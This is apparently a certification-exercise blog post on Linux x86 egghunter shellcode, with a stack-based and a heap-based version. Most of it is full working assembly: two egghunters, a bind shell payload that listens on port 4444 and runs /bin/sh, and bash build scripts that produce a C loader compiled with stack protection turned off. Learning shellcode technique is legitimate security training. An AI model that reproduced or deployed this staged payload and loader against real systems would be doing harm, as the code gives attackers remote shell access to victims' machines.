SLAE32 Challenge #3 - Linux egghunter Shellcode in Assembly

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-644

GitHub resource containing challenge files:

https://github.com/bl305/SLAE32

Local link to source files:

http://itfanatic.com/files/Challenge_03_Final.ZIP


Source used:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

Memory layout

http://duartes.org/gustavo/blog/post/anatomy-of-a-program-in-memory

Egghunter using stack:

First things first. Anatomy of the memory can be seen in the following picture:

ITFanatic.com

An egghunter works the same way as in real life. Someone hides an egg and someone goes and look for it until he finds it.

There are two implementations below:

  1. Egghunter in stack (easier, will fail with ASLR)
  2. Egghunter in Heap (more roboust)

1. Egghunter in stack:
You can look at it like a two stager execution model. We put an egg in the beginning of our shellcode on the stack, and it will be called "bali" (stage 2). We will put it there twice. Why? Because when we read the memory, the search function will have the string in memory once, and it will find itself. To ignore this case, we can put the egg twice after each other. which makes it unique in memory. We will build a search tool (stage 1) which reads in one direction, that will look for the shellcode, and will execute the shellcode after the "egg". Bottleneck is that you can only search in one memory segment, or in multiple segments without gaps in between.

2. Egghunter in heap:

Same logic, except that the egg will be in the heap. The funny thing about heap is, that we will have no clue about the exact memory address, and we start the search sequentially in the .text segment, which comes first. Then we will read the memory and will end up getting SIGSEGV errors. This is not a real error, but means that the memory doesn't contain any useful commands, so leave him alone:). We will need to do some SIGSEGV error checks to be able to search the entire heap.

Stack based egghunter

I'll start reading the memory from where the program is, to start with a valid address in the memory as a starting point for the search (EAX). There is a "next" label which is a label to increase memory address for the next read. "isegg" label is a procedure to read the memory and act upon the results of the read. I hate doing error checks, so I am just reading the memory "back"/"forward" (very relative, but if we look at the logical context, we read back:)) to find the egg. My egg is "bali"="0x696c6162" which is reverse because of little-endian. Good. So we focus on the memory that is 8 byte before the shellcode, and match it to the eggcode. If fails, we increase the memory address, and read the next address. If matches, we go and compare the memory that is 4 bytes before the shellcode, and check if it matches the egg. If not, increase memory and do the checks again with the new address. If matches, we found the egghunter code, we need to execute the shellcode: JMP EAX

Assembly code:

global _start
 
section .text
 
_start:
    pop eax ;save value of EAX
_next:
    inc eax ;read the next value from memory
 
_isegg:
 
    cmp dword [eax-0x8],0x696c6162 ;start of egg
    jne _next ;if no match, go and increase eax to point to the next address in memory
 
    cmp dword [eax-0x4],0x696c6162 ;second match for the egg - positive match
    jne _next ;if second match fails, go to the next memory address
 
    jmp eax ; execute the shellcode 
</p>

The actual shellcode is from: SLAE32 Challenge #1 Linux Bind Shell in Assembly

The only modification to it is the text: db "balibali". This is our egg.

Bind shell script with the egg in it:

global _start
 
section .text
 
db "balibali"
 
_start:
 
;sockfd= socket(AF_INET, SOCK_STREAM, 0)
xor eax,eax ;clean eax
mov al,0x66 ;set syscall number to socket
xor ebx,ebx ;zero out ebx
push ebx ;stack protocol=0, default (could be 6 for TCP)
inc ebx ;prepare ebx=1 for stack
push ebx ;stack type=1, sock_stream
push byte 0x2 ;stack domain, af_inet
mov ecx,esp ;store a pointer to the parameters for dup2
int 0x80 ;call the syscall, it returns the socket file descriptor to EAX
 
mov esi, eax ;store sockfd into ESI
 
;bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
mov al,0x66 ;set syscall number to socket
pop ebx ;take the 2 from the stack to use as bind
;pop esi ; remove the 0x1 from stack and leave 0x0
 
;prepare struct
xor edx,edx ;zero out edx
push edx ;set the sin_addr=0 (INADDR_ANY)
push word 0x5C11 ;set sin_port=4444
push word bx ;sin_family AF_INET	=0x2
mov ecx, esp ;save pointer
;prepare struct end
 
push 0x10 ;addrlen=16 structure length
push ecx ; struck sockaddr pointer
push esi ; this is a pointer to the file descriptor sockfd
mov ecx, esp ;pointer to bind() args
int 0x80 ; exec sys bind
 
;listen
mov al,0x66 ;syscall 102
mov bl, 0x4 ;sys_listen
push ebx ;backlog=0x0
push esi ;sockfd
mov ecx,esp ;save pointer to args
int 0x80 ;call syscall
 
;accept
mov al,0x66 ;syscall 102
mov bl, 0x5 ;sys_accept
push edx ; addrlen=0x0
push edx ; struct=0x0
push esi ;socketd
mov ecx, esp ;save pointer to args
int 0x80 ;call syscall
 
 
;redirect
xchg ebx, eax ;store the socketfd in ebx, and 0x5 in eax. EBX will be the oldfd in DUP2
pop ecx ; pull the 0x00000000 from the stack
mov cl, 0x2 ; set counter to 2, this will be newfd in DUP2
;loop to call dup2 3 times and duplicate file descriptor for STDIN, STDOUT and STDERR
myloop:
 mov al,0x3F ;dup2 syscall
 int 0x80 ;syscall dup2
 dec ecx ; decrement counter
 jns myloop ; jmp to loop as long as SF is not set to 1
 
 
;execve
xor eax,eax
push eax ;push the ending 0x0
push 0x68732f2f ; "hs//" the trick is "//"="/" tom make it four bytes
push 0x6e69622f ; "nib/"
mov ebx, esp ;save the pointer to filename
 
push eax ; set argument t 0x0
mov ecx, esp ;save the pointer to argument envp
 
push eax ; set argument t 0x0
mov edx, esp ;save the pointer to argument ptr
 
mov al,0xb ;call execve
int 0x80 ; execute syscall 
 </p>

I have developed the compiler script, which can change the egghunter code and compile the whole thing. Be careful, NULL characters in the egg brakes the whole fun. Actually it terminates the program.

Compile script:

#!/bin/bash
 
echo '####################################################################'
echo 'Usage: ./compile.sh <egghunter> <shellcode> <egg>'
echo 'Example (without extensions!): ./compile.sh egghunter shellcode woof'
echo '####################################################################'
echo '[+] Changing egg to '$3' ...'
>eggcode.txt
for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done
echo '[+] New eggcode in hex little-endian:'
myegg=`cat eggcode.txt`
echo $myegg
cp $1.nasm $1.nasm_orig
sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm
 
echo '[+] Assembling '$1' Egghunter with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
 
echo '[+] Linking ...'
ld -o $1 $1.o
 
echo '[+] Objdump ...'
>egghunter.txt
for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done
myegghunter=`cat egghunter.txt`
echo $myegghunter
 
 
###########################################################################
#changing egg plaintext
cp $2.nasm $2.nasm_orig
sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm
 
echo '[+] Assembling '$2' payload shellcode with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm
 
echo '[+] Linking ...'
ld -o $2 $2.o
 
echo '[+] Objdump ...'
>shellcode.txt
for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done
myshellcode=`cat shellcode.txt`
echo $myshellcode
 
echo '[+] Assemble shellcode C ...'
 
echo "#include<stdio.h>" >shellcode.c
echo "#include<string.h>" >>shellcode.c
echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c
echo $myegghunter"\";" >>shellcode.c
echo "unsigned char shellcode[] = \"\\" >>shellcode.c
echo $myshellcode"\";" >>shellcode.c
echo "main()" >>shellcode.c
echo "{" >>shellcode.c
echo "printf(\"Egghuntercode Length:  %d\n\", strlen(egghuntercode));" >>shellcode.c
echo "printf(\"Shellcode Length    :  %d\n\", strlen(shellcode));" >>shellcode.c
echo "  int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c
echo "  ret();" >>shellcode.c
echo "}" >>shellcode.c
 
echo '[+] Compile shellcode.c'
 
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 
echo '[+] Done!'  
</p>

Egghunter using heap:

So this is more challanging. Why? Because we will need to do some memory read error verification in assembly. I'm not going to reinvent the wheel, but use others brain. I found that using sigaction is a good solution:

http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf

Function prototype:
int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);
Purpose: Used to change an action by a process on receiving a specific signal. Can handle any valid signal except for SIGKILL/SIGSTOP
Sigaction structure definition as per prototype:
struct sigaction {
void (*sa_handler)(int);
void (*sa_sigaction)(int, siginfo_t *, void *);
sigset_t sa_mask;
int sa_flags;
void (*sa_restorer)(void);
};

I have used the "scasd" function as suggested in the referenced paper to compare the egg to the memory address contents. In order to start with a clean sheet, I executed a "cld" to clear the carry flag. Not doing this could make the scasd fail.

By initializing edi to the pointer value that is currently in ecx, the scasd instruction can be used to compare the contents of the memory stored in edi to the dword value that is currently in ecx. This allows for a comparison and has an added side effect of incrementing edi by four after each comparison

The code will read the memory segments based on the segment size in the given OS (can be retrieved using "getconf PAGE_SIZE", in our case 4096). Unfortunately 4096 in hex would require us to pul nulls in our code, which would terminate the code. So I used atrick, and put 4095 and increased by 1.

Tho following code is commented below, it basically reads the memory by four bytes and compare them to egg. If matches twice in a row, the code at EDI will be executed.

Assembly code:

global _start                   
 
section .text
_start:
        cld 		;clear carry flag to make sure that scasd is working
        xor edx,edx 	;clear edx
        xor ecx,ecx 	;clear ecx
 
next_page:
        or cx,0xfff 	;add 4095 - this is from the output of command "getconf PAGE_SIZE"=4096
		    	;to avoid zeroes in shellcode, we put 4095 and increase it by 1
next_addr:
        inc ecx ;PAGE_SIZE=4096
 
;;     lea ebx, [ecx]	;[ecx+0x4] proper alignment, avoiding SIGSEGV in first scasd
 
	push 0x43 	;sigaction() syscall
	pop eax;
	int 0x80 	; make the syscall
 
	cmp al, 0xf2 	;test for fault EFAULT
	je next_page
	mov eax, 0x696c6162	; egg code to find
	mov edi,ecx 	;edi contains the address to look for
	scasd		;look for the egg, increase edi with +4 if match
	jnz next_addr	;no marker found, jump to next address
	scasd		;look for the egg, increase edi with +4 if match
	jnz next_addr	;no marker found, jump to next address
	jmp edi		;found egg, jump to shellcode
</p>

Compile script:

#!/bin/bash
 
echo '####################################################################'
echo 'Usage: ./compile.sh <egghunter> <shellcode> <egg>'
echo 'Example (without extensions!): ./compile.sh egghunter shellcode woof'
echo '####################################################################'
echo '[+] Changing egg to '$3' ...'
>eggcode.txt
for i in `echo -n $3|rev|tr -d '\n'|xxd -g 1 -c 1|cut -d " " -f2|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "$i" >>eggcode.txt ; done
echo '[+] New eggcode in hex little-endian:'
myegg=`cat eggcode.txt`
echo $myegg
cp $1.nasm $1.nasm_orig
sed s/0x696c6162/0x$myegg/g < $1.nasm_orig > $1.nasm
 
echo '[+] Assembling '$1' Egghunter with Nasm ... '
nasm -f elf32 -o $1.o $1.nasm
 
echo '[+] Linking ...'
ld -o $1 $1.o
 
echo '[+] Objdump ...'
>egghunter.txt
for i in `objdump -d $1|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>egghunter.txt ; done
myegghunter=`cat egghunter.txt`
echo $myegghunter
 
 
###########################################################################
#changing egg plaintext
cp $2.nasm $2.nasm_orig
sed s/balibali/$3$3/g < $2.nasm_orig > $2.nasm
 
echo '[+] Assembling '$2' payload shellcode with Nasm ... '
nasm -f elf32 -o $2.o $2.nasm
 
echo '[+] Linking ...'
ld -o $2 $2.o
 
echo '[+] Objdump ...'
>shellcode.txt
for i in `objdump -d $2|tr '\t' ' '|tr ' ' '\n'|grep -Eo '^[0-9a-f]{2}$'` ; do echo -n "\x$i" >>shellcode.txt ; done
myshellcode=`cat shellcode.txt`
echo $myshellcode
 
echo '[+] Assemble shellcode C ...'
#myshellcode="AABBCCDDEEFFABCD"
echo "#include<stdio.h>" >shellcode.c
echo "#include<string.h>" >>shellcode.c
#echo "#include<stdio.h>" >>shellcode.c
echo "unsigned char egg[] = \"$3\";" >>shellcode.c
echo "unsigned char egghuntercode[] = \"\\" >>shellcode.c
echo $myegghunter"\";" >>shellcode.c
echo "unsigned char shellcode[] = \"\\" >>shellcode.c
echo $myshellcode"\";" >>shellcode.c
echo "main()" >>shellcode.c
echo "{" >>shellcode.c
echo "printf(\"Egghuntercode Length:  %d\n\", strlen(egghuntercode));" >>shellcode.c
echo "printf(\"Shellcode Length    :  %d\n\", strlen(shellcode));" >>shellcode.c
echo "char *heap;" >> shellcode.c
echo "heap=malloc(400);" >> shellcode.c
echo "printf(\"Memory address of shellcode: %p\n\",heap);" >> shellcode.c
echo "memcpy(heap+0,egg,4);" >> shellcode.c
echo "memcpy(heap+4,egg,4);" >> shellcode.c
echo "memcpy(heap+8,shellcode, sizeof(shellcode)-1);" >> shellcode.c
echo "  int (*ret)() = (int(*)())egghuntercode;" >>shellcode.c
echo "  ret();" >>shellcode.c
echo "}" >>shellcode.c
 
echo '[+] Compile shellcode.c'
 
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
 
echo '[+] Done!'  
</p>